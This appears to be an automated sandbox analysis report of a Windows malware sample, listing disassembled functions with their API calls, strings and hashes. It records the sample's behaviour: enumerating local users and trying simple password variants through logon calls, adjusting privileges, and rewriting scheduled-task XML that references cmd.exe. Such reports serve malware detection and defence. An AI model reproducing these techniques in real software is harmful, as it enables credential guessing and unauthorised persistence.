                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                              Function 0044E613 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction ID: e1d19a3f0243f14b79b01c451a6d6cb00abb7833888d4a0596576d76429fa551
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E81C5319893918BC795DF38C8D65D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                              Function 0043CC10 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                              Function 0040ED30 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                              Function 0043CA30 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                              Function 0040EF50 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                              Function 0042EB80 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                              Function 004147E0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                              Function 00414050 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                              Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                              Function 00403699 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              • API String ID: 3028510665-1934172683
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              Function 00403050 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              • API String ID: 2839743307-723907552
                                                                                                                                                                                                              • Opcode ID: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2911081799
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
